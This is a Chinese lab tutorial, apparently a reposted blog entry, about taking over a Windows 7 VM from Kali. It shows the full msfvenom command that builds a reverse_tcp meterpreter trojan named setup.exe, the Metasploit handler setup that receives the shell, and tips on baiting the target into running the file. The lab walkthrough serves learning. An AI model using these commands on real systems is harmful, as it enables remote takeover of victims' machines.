admin 管理员组文章数量: 887021
Kali环境下渗透目标(win7)虚拟机
注:(此文章,是我看了CSDN上另一位博主的文章,我在自己在电脑上实验了一遍的结果。另外,本文仅供学习交流。用来做非法之事,本人概不负责)
准备:
1,在电脑上安装VMware,并下载安装虚拟机kali;虚拟机Windows7
2,要使两台虚拟机相互之间能ping通。在两台机子都被启动以后,在其中一台电脑的终端命令界面,输入 ping (另一虚拟机ip地址)。
如果无法ping通,点击菜单栏里的编辑,在下拉列表中点击‘虚拟网络编辑器‘。查看两虚拟机是否在同一网卡内,若不在则修改至同一网卡。
具体步骤一:要想植入木马病毒,前提条件是要先有这么一个木马,所以,第一步就是建立木马病毒。这里需要利用Metaspolit工具。(metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。)
Kali虚拟机 ip:192.168.90.128 Windows虚拟机 ip:192.168.90.129
查看IP命令:kali—ip add ; windows—ipconfig
1,建立一个名为setup.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.90.128 LPORT=5050 -f exe -o setup.exe*
#(建立的文件可在root里面看到)
2、打开msf控制台,加载exploit/multi/handler模块,同时设置**本地主机地址,本地端口
代码:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.90.128
msf exploit(handler) > set lport 5050
以上步骤结束之后,木马就做成功了,如果把渗透比作钓鱼,鱼饵已经有了,剩下的就是让目标发现鱼饵并吞下。此木马只要目标主机点击之后就会被激活运行。
在Windows7虚拟机上点击并运行setup.exe
3、开始执行渗透攻击并监听
run
鱼咬钩了,之后就是捞上来
4、后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。
输入sysinfo可查看目标机子的大致情况。 输入help可查看具体命令。
版权声明:本文标题:Kali环境下渗透目标(win7)虚拟机 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1716167670h669205.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论